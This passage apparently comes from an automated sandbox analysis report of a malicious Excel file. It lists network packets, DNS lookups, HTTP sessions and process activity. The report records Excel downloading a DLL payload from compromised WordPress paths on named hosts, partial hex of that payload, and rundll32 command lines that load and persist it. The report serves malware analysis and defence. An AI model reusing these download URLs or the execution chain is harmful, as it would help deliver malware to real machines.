                Dec 2, 2021 21:22:21.359771967 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:21.359788895 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.359823942 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:21.359827995 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.359853029 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:21.359868050 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.359895945 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:21.359906912 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.359935999 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:21.359946966 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.359963894 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:21.359993935 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:21.362571955 CET4916680192.168.2.2247.96.4.95
                Dec 2, 2021 21:22:21.615159988 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.615184069 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.615195990 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.615225077 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.615242958 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.615259886 CET804916647.96.4.95192.168.2.22
                Dec 2, 2021 21:22:21.615277052 CET804916647.96.4.95192.168.2.22

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Dec 2, 2021 21:22:19.041716099 CET5216753192.168.2.228.8.8.8
                Dec 2, 2021 21:22:19.388930082 CET53521678.8.8.8192.168.2.22
                Dec 2, 2021 21:22:20.074377060 CET5059153192.168.2.228.8.8.8
                Dec 2, 2021 21:22:20.325692892 CET53505918.8.8.8192.168.2.22

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Dec 2, 2021 21:22:19.041716099 CET192.168.2.228.8.8.80x8d91Standard query (0)sadabahar.com.npA (IP address)IN (0x0001)
                Dec 2, 2021 21:22:20.074377060 CET192.168.2.228.8.8.80xd9c5Standard query (0)www.duoyuhudong.cnA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Dec 2, 2021 21:22:19.388930082 CET8.8.8.8192.168.2.220x8d91No error (0)sadabahar.com.np194.233.67.242A (IP address)IN (0x0001)
                Dec 2, 2021 21:22:20.325692892 CET8.8.8.8192.168.2.220xd9c5No error (0)www.duoyuhudong.cn47.96.4.95A (IP address)IN (0x0001)

                HTTP Request Dependency Graph

                • sadabahar.com.np
                • www.duoyuhudong.cn

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.2249165194.233.67.24280C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Dec 2, 2021 21:22:19.580261946 CET0OUTGET /wp-includes/pUMqITCt83a/ HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: sadabahar.com.np
                Connection: Keep-Alive
                Dec 2, 2021 21:22:20.056572914 CET2INHTTP/1.1 404 Not Found
                Connection: Keep-Alive
                Keep-Alive: timeout=5, max=100
                x-powered-by: PHP/7.4.25
                content-type: text/html; charset=UTF-8
                expires: Wed, 11 Jan 1984 05:00:00 GMT
                cache-control: no-cache, must-revalidate, max-age=0
                link: <https://sadabahar.com.np/wp-json/>; rel="https://api.w.org/"
                transfer-encoding: chunked
                content-encoding: gzip
                vary: Accept-Encoding,User-Agent
                date: Thu, 02 Dec 2021 20:22:19 GMT
                server: LiteSpeed
                Data Raw: 31 30 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 5b ff 73 db 36 b2 ff d9 fe 2b 60 7a 6a 8b 2d 49 51 92 65 59 94 e5 de 35 4d e7 fd d0 5e 6f 9a 76 de bc 49 f2 3c 10 09 51 48 28 80 0f 80 64 fb 14 fd ef 37 0b 90 14 bf c9 56 9c a4 b9 99 d7 78 1c 93 c0 62 b1 58 2c b0 9f 5d 80 d7 27 3f fe fa e2 f7 ff f9 e7 4b b4 50 cb e4 e6 f8 1a fe a0 04 b3 78 6a 11 e6 fe f1 ca ba 39 3e be 5e 10 1c dd 1c 1f 5d 2f 89 c2 28 5c 60 21 89 9a 5a 7f fc fe 93 7b 65 15 e5 0c 2f c9 d4 5a 53 72 97 72 a1 2c 14 72 a6 08 53 53 eb 8e 46 6a 31 8d c8 9a 86 c4 d5 2f 0e a2 8c 2a 8a 13 57 86 38 21 d3 9e 83 96 94 d1 e5 6a 99 17 68 b6 09 65 ef 91 20 c9 d4 4a 05 9f d3 84 58 68 21 c8 7c 6a 2d 94 4a 83 6e 37 5e a6 b1 c7 45 dc bd 9f b3 6e af 07 6d 8e ae 15 55 09 b9 f9 27 8e 09 62 5c a1 39 5f b1 08 9d 9d 5e f5 7b bd 09 7a 85 23 3c c3 0b 2c d0 2f ab 44 51 f4 82 33 a9 c4 2a 54 94 b3 eb ae 69 7a 6c 86 a9 87 73 2e f8 8c 2b 79 5e 0c e6 7c 89 ef 5d ba c4 31 71 53 41 60 b0 41 82 45 4c ce 51 f7 e6 f8 ba 10 f8 3c 62 12 08 e6 44 85 8b 73 23 f5 79 b7 3b e7 4c 49 2f e6 3c 4e 08 4e a9 f4 42 be 3c ac a5 f4 ee 60 a4 35 62 0b 27 8a 08 86 15 b1 90 7a 48 c9 d4 c2 69 9a d0 10 c3 78 ba 42 ca ef ee 97 89 85 f4 b8 a6 d6 63 83 47 67 02 ff df 8a 4f d0 4f 84 44 65 35 cb a0 db 95 b9 d6 40 5e 8f a5 dd 39 21 51 d7 aa 0e f9 0b c8 f2 82 2f 97 84 29 79 98 50 61 46 5d 92 ee e8 e8 5a 86 82 a6 2a d3 8e 22 f7 aa fb 0e af b1 29 d5 06 73 74 47 59 c4 ef bc db bb 94 2c f9 3b fa 8a 28 45 59 2c d1 14 6d ac 19 96 e4 0f 91 58 81 36 39 19 bc e9 be e9 66 53 f1 a6 ab cd 40 be e9 86 5c 90 37 5d dd f8 4d b7 37 f0 7a 9e ff a6 3b ea df 8f fa 6f ba 96 63 91 7b 65 05 96 97 b2 d8 72 2c b9 8e 9f c7 4f ae 63 cd 4d ae e3 97 86 a1 5c 6b 86 7c 25 42 62 05 1b 2b e4 2c c4 4a 8b 91 c9 6b c4 ad 4d de 9b ee 5d ea 52 16 26 ab 88 c8 37 dd 77 52 17 e8 66 ae 20 09 c1 92 78 4b ca bc 77 f2 fb 35 11 d3 a1 77 e5 f5 ad ed 76 72 7c 74 74 74 32 5f 31 bd 56 3a c4 c1 8e b2 37 6b 2c 10 73 84 c3 1d 3a c5 5e 28 08 56 e4 65 42 60 d6 3a 56 88 d9 1a 4b cb 76 d2 29 f5 62 a2 5e c0 86 70 af ce ce ca 6f 1d ab 1f 59 f6 24 67 8c 64 87 e4 8c f1 f4 95 12 94 c5 de 5c f0 e5 8b 05 16 2f 78 44 26 a9 17 26 04 8b df 48 a8 3a be e3 3b d4 33 5b 0a f5 16 84 c6 0b 65 3b a9 37 a7 49 f2 3b b9 57 1d ec c1 82 78 e8 a8 05 95 0e b1 1d df f1 ed 09 99 52 4f f1 1f b1 c2 7f fc f6 73 c7 9e 08 a2 56 82 a1 e7 33 56 86 b1 43 a6 d3 2a eb 6d 31 ac b0 43 8c b6 54 53 4f 99 31 da 13 e5 49 11 4e 89 a3 bc 88 cc 89 98 2a cf 2c ea ba d9 3a 18 d4 99 e9 59 fe f0 f0 3b 8e ff 81 97 a4 63 c1 3e 6d d9 af fd b7 30 6c c2 a2 17 0b 9a 44 1d 65 6f e7 5c 74 f8 f4 ef 42 e0 87 8e 35 4f 30 58 8e b1 14 db 51 9e 5c a5 b0 65 cb e9 86 ac 89 78 50 0b ca e2 e0 c4 77 76 6f 2f ef 43 92 aa 9f 12 0c e5
                Data Ascii: 108c[s6+`zj-IQeY5M^ovI<QH(d7VxbX,]'?KPxj9>^]/(\`!Z{e/ZSrr,rSSFj1/*W8!jhe JXh!|j-Jn7^EnmU'b\9_^{z#<,/DQ3*Tizls.+y^|]1qSA`AELQ<bDs#y;LI/<NNB<`5b'zHixBcGgOODe5@^9!Q/)yPaF]Z*")stGY,;(EY,mX69fS@\7]M7z;oc{er,OcM\k|%Bb+,JkM]R&7wRf xKw5wvr|ttt2_1V:7k,s:^(VeB`:VKv)b^poY$gd\/xD&&H:;3[e;7I;WxROsV3VC*m1CTSO1IN*,:Y;c>m0lDeo\tB5O0XQ\exPwvo/C


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.224916647.96.4.9580C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Dec 2, 2021 21:22:20.586219072 CET10OUTGET /wp-content/we8xi/ HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: www.duoyuhudong.cn
                Connection: Keep-Alive
                Dec 2, 2021 21:22:20.848328114 CET12INHTTP/1.1 200 OK
                Server: nginx/1.8.1
                Date: Thu, 02 Dec 2021 20:22:20 GMT
                Content-Type: application/x-msdownload
                Content-Length: 460288
                Connection: keep-alive
                X-Powered-By: PHP/7.2.15
                Set-Cookie: 61a92afcad18b=1638476540; expires=Thu, 02-Dec-2021 20:23:20 GMT; Max-Age=60; path=/
                Cache-Control: no-cache, must-revalidate
                Pragma: no-cache
                Last-Modified: Thu, 02 Dec 2021 20:22:20 GMT
                Expires: Thu, 02 Dec 2021 20:22:20 GMT
                Content-Disposition: attachment; filename="Z8LJs4fFM8.dll"
                Content-Transfer-Encoding: binary
                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 0d e9 1a ec 6c 87 49 ec 6c 87 49 ec 6c 87 49 9f 0e 84 48 e1 6c 87 49 9f 0e 82 48 71 6c 87 49 9f 0e 83 48 fa 6c 87 49 be 19 82 48 bf 6c 87 49 be 19 83 48 fc 6c 87 49 be 19 84 48 fb 6c 87 49 9f 0e 81 48 ef 6c 87 49 9f 0e 86 48 fd 6c 87 49 ec 6c 86 49 37 6c 87 49 59 19 8e 48 e3 6c 87 49 59 19 87 48 ed 6c 87 49 59 19 78 49 ed 6c 87 49 ec 6c 10 49 ed 6c 87 49 59 19 85 48 ed 6c 87 49 52 69 63 68 ec 6c 87 49 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 66 ff a8 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1d 00 76 03 00 00 9a 03 00 00 00 00 00 4e 4b 01 00 00 10 00 00 00 90 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 07 00 00 04 00 00 a1 2d 07 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 91 04 00 a0 08 00 00 50 9a 04 00 b4 00 00 00 00 e0 04 00 48 2a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 07 00 bc 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 56 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 03 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 75 03 00 00 10 00 00 00 76 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 1a 01 00 00 90 03 00 00 1c 01 00 00 7a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 23 00 00 00 b0 04 00 00 16 00 00 00 96 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 48 2a 02 00 00 e0 04 00 00 2c 02 00 00 ac 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 bc 2c 00 00 00 10 07 00 00 2e 00 00 00 d8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$lIlIlIHlIHqlIHlIHlIHlIHlIHlIHlIlI7lIYHlIYHlIYxIlIlIlIYHlIRichlIPELfa!vNK@-@PH*,V@.textuv `.rdataz@@.data#@.rsrcH*,@@.reloc,.@B


                Code Manipulations

                Statistics

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:21:21:16
                Start date:02/12/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Imagebase:0x13f560000
                File size:28253536 bytes
                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:21:21:24
                Start date:02/12/2021
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.8898178241
                Imagebase:0xa90000
                File size:44544 bytes
                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:21:21:56
                Start date:02/12/2021
                Path:C:\Windows\System32\svchost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                Imagebase:0xff860000
                File size:27136 bytes
                MD5 hash:C78655BC80301D76ED4FEF1C1EA40A7D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                General

                Start time:21:22:41
                Start date:02/12/2021
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",DllRegisterServer
                Imagebase:0xa90000
                File size:44544 bytes
                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:21:23:58
                Start date:02/12/2021
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):
                Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nrenernv\nnave.jwm",ILDADvMws
                Imagebase:
                File size:44544 bytes
                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis

                Reset < >